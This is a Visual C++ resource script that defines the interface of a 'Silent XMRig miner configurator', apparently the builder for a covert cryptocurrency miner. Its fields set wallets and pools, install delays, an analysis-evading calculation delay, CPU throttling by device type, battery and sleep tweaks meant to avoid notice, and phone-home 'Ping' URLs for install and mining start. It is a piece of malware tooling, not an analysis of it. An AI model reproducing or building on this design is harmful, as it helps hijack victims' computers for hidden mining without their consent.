// Microsoft Visual C++ generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// English (United States) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
#pragma code_page(1252)

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE 
BEGIN
    "resource.h\0"
END

2 TEXTINCLUDE 
BEGIN
    "#include ""winres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE 
BEGIN
    "\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_DIALOG1 DIALOGEX 0, 0, 415, 438
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Silent XMRig miner configurator"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    DEFPUSHBUTTON   "Generate",IDOK,293,417,50,14
    PUSHBUTTON      "Cancel",IDCANCEL,358,417,50,14
    EDITTEXT        IDC_EDIT1,8,17,400,15,ES_AUTOHSCROLL
    GROUPBOX        "Wallets addresses",IDC_STATIC,7,8,401,99
    EDITTEXT        IDC_EDIT2,8,35,400,15,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT3,8,53,400,15,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT4,8,71,400,15,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT5,8,89,400,15,ES_AUTOHSCROLL
    LTEXT           "Time Zone 1 pools",IDC_STATIC,17,109,58,8
    LTEXT           "Time Zone 2 pools",IDC_STATIC,122,110,58,8
    LTEXT           "Time Zone 3 pools",IDC_STATIC,221,110,58,8
    LTEXT           "Time Zone 4 pools",IDC_STATIC,320,110,58,8
    EDITTEXT        IDC_EDIT6,7,119,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT7,7,134,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT8,7,149,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT9,7,164,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT10,108,119,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT11,108,134,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT12,108,149,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT13,108,164,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT14,210,119,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT15,210,134,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT16,210,149,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT17,210,164,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT18,321,119,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT19,321,134,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT20,321,149,87,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT21,321,164,87,14,ES_AUTOHSCROLL
    LTEXT           "Min.",IDC_STATIC,9,193,14,8
    LTEXT           "Max.",IDC_STATIC,9,207,17,8
    EDITTEXT        IDC_EDIT22,26,190,40,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT23,26,205,40,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT24,117,190,40,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT25,117,205,40,14,ES_AUTOHSCROLL
    LTEXT           "Min.",IDC_STATIC,98,194,14,8
    LTEXT           "Max.",IDC_STATIC,98,207,17,8
    GROUPBOX        "Delay before install (days)",IDC_STATIC,94,181,96,40
    GROUPBOX        "Installer delay (milisec)",IDC_STATIC,8,181,88,40
    GROUPBOX        "Minimum RAM for light mode(Mb)",IDC_STATIC,7,220,111,28
    EDITTEXT        IDC_EDIT27,123,230,27,14,ES_AUTOHSCROLL | ES_NUMBER
    GROUPBOX        "CPU(%) Desktop",IDC_STATIC,118,220,64,28
    EDITTEXT        IDC_EDIT28,241,230,64,14,ES_AUTOHSCROLL | ES_NUMBER
    GROUPBOX        "Additional XMRig arguments",IDC_STATIC,7,246,401,24
    EDITTEXT        IDC_EDIT29,10,254,392,14,ES_AUTOHSCROLL
    GROUPBOX        "Custom arguments config (Everything above will be ignored) one of 3 arguments will be selected randomly at XMRig start",IDC_STATIC,7,299,401,62
    EDITTEXT        IDC_EDIT30,7,310,401,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT31,7,327,401,14,ES_AUTOHSCROLL
    GROUPBOX        "Arguments test",IDC_STATIC,7,361,401,25
    EDITTEXT        IDC_EDIT32,7,344,401,14,ES_AUTOHSCROLL
    PUSHBUTTON      "Test",IDC_BUTTON1,7,417,61,14
    EDITTEXT        IDC_EDIT33,7,370,401,45,ES_MULTILINE | WS_VSCROLL
    GROUPBOX        "L3 cache/thread(KB)",IDC_STATIC,235,220,77,28
    EDITTEXT        IDC_EDIT26,10,230,100,14,ES_AUTOHSCROLL | ES_NUMBER
    PUSHBUTTON      "Load",IDC_BUTTON2,228,417,50,14
    GROUPBOX        "Miner install finished 'Ping' URL",IDC_STATIC,7,270,201,29
    GROUPBOX        "Miner starts mining 'Ping' URL",IDC_STATIC,207,270,201,29
    EDITTEXT        IDC_EDIT34,12,280,190,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT35,212,280,190,14,ES_AUTOHSCROLL
    CONTROL         "Add heavy calculation delay",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,206,185,105,10
    CONTROL         "Do not mine while on battery power",IDC_CHECK2,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,206,196,130,10
    CONTROL         "Disable sleep",IDC_CHECK3,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,206,207,68,10
    EDITTEXT        IDC_EDIT36,186,230,27,14,ES_AUTOHSCROLL | ES_NUMBER
    GROUPBOX        "CPU(%) Laptop",IDC_STATIC,180,220,56,28
END


/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO
BEGIN
    IDD_DIALOG1, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 408
        TOPMARGIN, 7
        BOTTOMMARGIN, 431
    END
END
#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// AFX_DIALOG_LAYOUT
//

IDD_DIALOG1 AFX_DIALOG_LAYOUT
BEGIN
    0
END

#endif    // English (United States) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

